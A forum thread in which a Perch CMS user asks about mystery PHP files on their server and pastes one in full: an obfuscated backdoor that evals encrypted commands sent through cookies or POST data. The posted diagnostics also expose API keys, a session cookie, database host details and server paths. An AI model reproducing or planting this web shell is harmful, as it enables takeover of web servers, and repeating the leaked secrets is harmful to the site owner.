Random files being generated by server in perch cms

neahan · Jan 28th 2019

I noticed recently that there are random php file being generated in a project website. They have random filename 8 charity long (e.g. s4n8jtba.php) and the content are as follows:

PHP

<?php
$ngpsdj = '0#e4H\'s_86mu5n13xglbctpya-*kv7i2ordf';$vuheeac = Array();$vuheeac[] = $ngpsdj[31].$ngpsdj[3].$ngpsdj[9].$ngpsdj[20].$ngpsdj[14].$ngpsdj[2].$ngpsdj[14].$ngpsdj[15].$ngpsdj[25].$ngpsdj[14].$ngpsdj[8].$ngpsdj[8].$ngpsdj[12].$ngpsdj[25].$ngpsdj[3].$ngpsdj[31].$ngpsdj[19].$ngpsdj[24].$ngpsdj[25].$ngpsdj[8].$ngpsdj[34].$ngpsdj[34].$ngpsdj[8].$ngpsdj[25].$ngpsdj[20].$ngpsdj[24].$ngpsdj[24].$ngpsdj[29].$ngpsdj[35].$ngpsdj[35].$ngpsdj[20].$ngpsdj[12].$ngpsdj[19].$ngpsdj[15].$ngpsdj[0].$ngpsdj[20];$vuheeac[] = $ngpsdj[4].$ngpsdj[26];$vuheeac[] = $ngpsdj[1];$vuheeac[] = $ngpsdj[20].$ngpsdj[32].$ngpsdj[11].$ngpsdj[13].$ngpsdj[21];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[7].$ngpsdj[33].$ngpsdj[2].$ngpsdj[22].$ngpsdj[2].$ngpsdj[24].$ngpsdj[21];$vuheeac[] = $ngpsdj[2].$ngpsdj[16].$ngpsdj[22].$ngpsdj[18].$ngpsdj[32].$ngpsdj[34].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[11].$ngpsdj[19].$ngpsdj[6].$ngpsdj[21].$ngpsdj[33];$vuheeac[] = $ngpsdj[24].$ngpsdj[33].$ngpsdj[33].$ngpsdj[24].$ngpsdj[23].$ngpsdj[7].$ngpsdj[10].$ngpsdj[2].$ngpsdj[33].$ngpsdj[17].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[18].$ngpsdj[2].$ngpsdj[13];$vuheeac[] = $ngpsdj[22].$ngpsdj[24].$ngpsdj[20].$ngpsdj[27];foreach ($vuheeac[7]($_COOKIE, $_POST) as $mzjzaqr => $sgpzis){function pbzhjwi($vuheeac, $mzjzaqr, $rkoyu){return $vuheeac[6]($vuheeac[4]($mzjzaqr . $vuheeac[0], ($rkoyu / $vuheeac[8]($mzjzaqr)) + 1), 0, $rkoyu);}function bfnuxvy($vuheeac, $bovpw){return @$vuheeac[9]($vuheeac[1], $bovpw);}function orees($vuheeac, $bovpw){$bnjmio = $vuheeac[3]($bovpw) % 3;if (!$bnjmio) {eval($bovpw[1]($bovpw[2]));exit();}}$sgpzis = bfnuxvy($vuheeac, $sgpzis);orees($vuheeac, $vuheeac[5]($vuheeac[2], $sgpzis ^ pbzhjwi($vuheeac, $mzjzaqr, $vuheeac[8]($sgpzis))));}

Has anyone else seen this with their project?

Perch diagnostics for the site are as follows:

PHP

Perch: 3.1.2
Production mode: Production (100)
Installed apps: content (3.1.2), assets (3.1.2), categories (3.1.2), perch_blog (5.6.1), perch_events (1.9.5), perch_forms (1.12), perch_gallery (2.8.9), perch_twitter (3.6.2)
DB driver: PDO
DB tables: perch3_blog_authors (3), perch3_blog_comments (0), perch3_blog_index (652), perch3_blog_posts (7), perch3_blog_posts_to_tags (0), perch3_blog_sections (1), perch3_blog_tags (0), perch3_blog_webmention_queue (0), perch3_blogs (1), perch3_categories (2), perch3_category_counts (2), perch3_category_sets (1), perch3_content_index (2929), perch3_content_items (475), perch3_content_regions (132), perch3_events (0), perch3_events_categories (0), perch3_events_to_categories (0), perch3_forms (1), perch3_forms_responses (24), perch3_gallery_albums (0), perch3_gallery_image_versions (0), perch3_gallery_images (0), perch3_menu_items (13), perch3_navigation (3), perch3_navigation_pages (50), perch3_page_templates (19), perch3_pages (42), perch3_resource_log (1983), perch3_resource_tags (296), perch3_resources (545), perch3_resources_to_tags (775), perch3_settings (37), perch3_twitter_scheduled_tweets (0), perch3_twitter_settings (2), perch3_twitter_tweets (0), perch3_user_passwords (3), perch3_user_privileges (47), perch3_user_role_privileges (2), perch3_user_roles (2), perch3_users (4)
Users: 4
App runtimes:
<?php
$apps_list = [
'perch_blog',
'perch_forms',
];
Scheduled tasks for perch_blog: delete_spam_comments (1440 mins), publish_posts (1 mins), process_webmentions (1 mins)
Scheduled tasks for perch_twitter: post_tweets (1 mins)
Editor plug-ins:
H1: 66e1d2dfb44f88717e51ec3424472a2f
L1: dabeb78f7e18e1ed8e8819b2b659c557
F1: 3b606135b33e6a102526838f4152a807
headerColour: #ffffff
content_singlePageEdit: 1
helpURL:
siteURL: /
hideBranding: 0
content_collapseList: 1
lang: en-gb
installedAt: 3.1.2
update_3.1.2: done
latest_version:
on_sale_version: 3.1.4
perch_blog_update: 5.6
perch_blog_post_url: /case-studies/post.php?s={postSlug}
headerScheme: light
perch_blog_site_name:
perch_blog_slug_format: %Y-%m-%d-{postTitle}
perch_blog_akismet_key:
perch_blog_max_spam_days: 0
dashboard: 0
sidebar_back_link: 0
hide_pwd_reset: 0
keyboardShortcuts: 0
content_hideNonEditableRegions: 0
content_frontend_edit: 0
content_skip_region_list: 0
assets_restrict_buckets: 0
perch_blog_comment_notify: 0
perch_blog_webmention_tx: 0
perch_blog_webmention_rx: 0
logoPath: /cms/resources/logo.png
perch_events_update: 1.8
perch_twitter_update: 3.5
perch_gallery_update: 2.8.5
perch_gallery_bucket_mode: single
perch_gallery_bucket: default
perch_events_detail_url: /events/event.php?s={eventSlug}
perch_gallery_basicUpload: 0
PERCH_DEVELOPMENT: 10
PERCH_STAGING: 50
PERCH_PRODUCTION: 100
PERCH_DB_USERNAME: cap_admin
PERCH_DB_SERVER: 205.186.165.244
PERCH_DB_DATABASE: admin_capability
PERCH_DB_PREFIX: perch3_
PERCH_TZ: UTC
PERCH_EMAIL_FROM: jamesh@thirdfloordesign.co.uk
PERCH_EMAIL_FROM_NAME: James Holmes
PERCH_LOGINPATH: /cms
PERCH_PATH: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net/cms
PERCH_CORE: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net/cms/core
PERCH_RESFILEPATH: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net/cms/resources
PERCH_RESPATH: /cms/resources
PERCH_TEMPLATE_FILTERS: 1
PERCH_GMAPS_API_KEY: AIzaSyCnDCyPw1L43hKlrK5huoShs-DRCRV5ghA
PERCH_YOUTUBE_API_KEY: AIzaSyDypfC97nK_yTd0dFkE0MfqPPNBfRGdpHo
PERCH_DEBUG:
PERCH_HTML5: 1
PERCH_RUNWAY:
PERCH_ERROR_MODE: DIE
PERCH_DATE_LONG: %d %B %Y
PERCH_DATE_SHORT: %d %b %Y
PERCH_TIME_SHORT: %H:%M
PERCH_TIME_LONG: %H:%M:%S
PERCH_RUNWAY_ROUTED:
PERCH_STRONG_PASSWORDS:
PERCH_ASSET_VERSION: 6738d5d5f5664f7c5e34
PERCH_PREVIEW_ARG: preview
PERCH_TEMPLATE_PATH: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net/cms/templates
PERCH_DEFAULT_DOC: index.php
PERCH_DEFAULT_EXT: .php
PERCH_PRODUCTION_MODE: 100
PERCH_XHTML_MARKUP:
PERCH_RWD: 1
PERCH_HTML_ENTITIES:
PERCH_SSL:
PERCH_STRIPSLASHES:
PERCH_PROGRESSIVE_FLUSH: 1
PERCH_PARANOID:
PERCH_FORCE_SECURE_COOKIES:
PERCH_DEFAULT_BUCKET: default
PERCH_TRANSLATION_ASSIST:
PERCH_PASSWORD_MIN_LENGTH: 6
PERCH_MAX_FAILED_LOGINS: 10
PERCH_AUTH_LOCKOUT_DURATION: 1 HOUR
PERCH_VERIFY_UPLOADS:
PERCH_PRIV_ASSIST:
PERCH_CUSTOM_EDITOR_CONFIGS:
PERCH_ENABLE_EXIF: 1
PERCH_AUTH_PLUGIN:
PERCH_DB_CHARSET: utf8
PERCH_DB_PORT:
PERCH_DB_SOCKET:
PERCH_APPS_EDITOR_PLUGIN: markitup
PERCH_APPS_EDITOR_MARKUP_LANGUAGE: markdown
Hosting settings
PHP: 5.4.13
Zend: 2.4.0
OS: Linux
SAPI: cgi-fcgi
Safe mode: not detected
MySQL client: 5.5.30
MySQL server: 5.5.30
Free disk space: 15.45 GB
Extensions: Core, date, ereg, libxml, openssl, pcre, zlib, bz2, calendar, ctype, hash, filter, ftp, gettext, gmp, SPL, iconv, pcntl, readline, Reflection, session, standard, shmop, SimpleXML, sockets, mbstring, tokenizer, xml, cgi-fcgi, curl, dom, fileinfo, gd, imagick, imap, json, ldap, exif, mcrypt, mysql, mysqli, odbc, PDO, pdo_mysql, PDO_ODBC, pdo_sqlite, Phar, snmp, sqlite3, wddx, xmlreader, xmlrpc, xmlwriter, xsl, zip, mhash, ionCube Loader
GD: Yes
ImageMagick: Yes
PHP max upload size: 128M
PHP max form post size: 8M
PHP memory limit: 128M
Total max uploadable file size: 8M
Resource folder writeable: Yes
Session timeout: 24 minutes
Native JSON: Yes
Filter functions: Yes
Transliteration functions: No
PATH: /sbin:/usr/sbin:/bin:/usr/bin
PP_CUSTOM_PHP_INI: /var/www/vhosts/system/capability.thirdfloordigital.net/etc/php.ini
PP_CUSTOM_PHP_CGI_INDEX: fastcgi
SCRIPT_NAME: /cms/core/settings/diagnostics/index.php
REQUEST_URI: /cms/core/settings/diagnostics/?extended
QUERY_STRING: extended
REQUEST_METHOD: GET
SERVER_PROTOCOL: HTTP/1.0
GATEWAY_INTERFACE: CGI/1.1
REMOTE_PORT: 54800
SCRIPT_FILENAME: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net/cms/core/settings/diagnostics/index.php
SERVER_ADMIN: root@localhost
DOCUMENT_ROOT: /var/www/vhosts/thirdfloordigital.net/capability.thirdfloordigital.net
REMOTE_ADDR: 82.35.54.156
SERVER_PORT: 80
SERVER_ADDR: 205.186.165.244
SERVER_NAME: capability.thirdfloordigital.net
SERVER_SOFTWARE: Apache
SERVER_SIGNATURE: <address>Apache Server at capability.thirdfloordigital.net Port 80</address>
HTTP_COOKIE: PHPSESSID=sndib8mkceubfj51fr32qqitg0; cmsa=1
HTTP_ACCEPT_LANGUAGE: en-US,en;q=0.9,la;q=0.8
HTTP_ACCEPT_ENCODING: gzip, deflate
HTTP_REFERER: http://capability.thirdfloordigital.net/cms/core/settings/diagnostics/
HTTP_ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
HTTP_DNT: 1
HTTP_UPGRADE_INSECURE_REQUESTS: 1
HTTP_CONNECTION: close
HTTP_X_ACCEL_INTERNAL: /internal-nginx-static-location
HTTP_X_FORWARDED_FOR: 82.35.54.156
HTTP_X_REAL_IP: 82.35.54.156
HTTP_HOST: capability.thirdfloordigital.net
UNIQUE_ID: XE7iU826pfQAACvdqgkAAAAB
FCGI_ROLE: RESPONDER
PHP_SELF: /cms/core/settings/diagnostics/index.php
REQUEST_TIME_FLOAT: 1548673619.4212
REQUEST_TIME: 1548673619

Display More

Server system settings

OS ‪CentOS 6.10 (Final)‬

Product Plesk Onyx

Version 17.8.11

PHP version: 5.4.13 (Outdated)

drewm · Jan 28th 2019

That looks like your hosting may have been hacked. You should probably talk to your host.

JordinB · Jan 28th 2019

You may also want to just make sure that none of your pages allow for self executing code via a GET param. Something that could be executing an shell_exec() or exec() function that would write its own file to the directory. I've seen this on an old site I inherited a while ago. Often it will create a page that will execute the mail function to be used as a larger network of spam sending bots.

neahan · Jan 28th 2019

ok. thanks i will look into that.

drewm Jan 28th 2019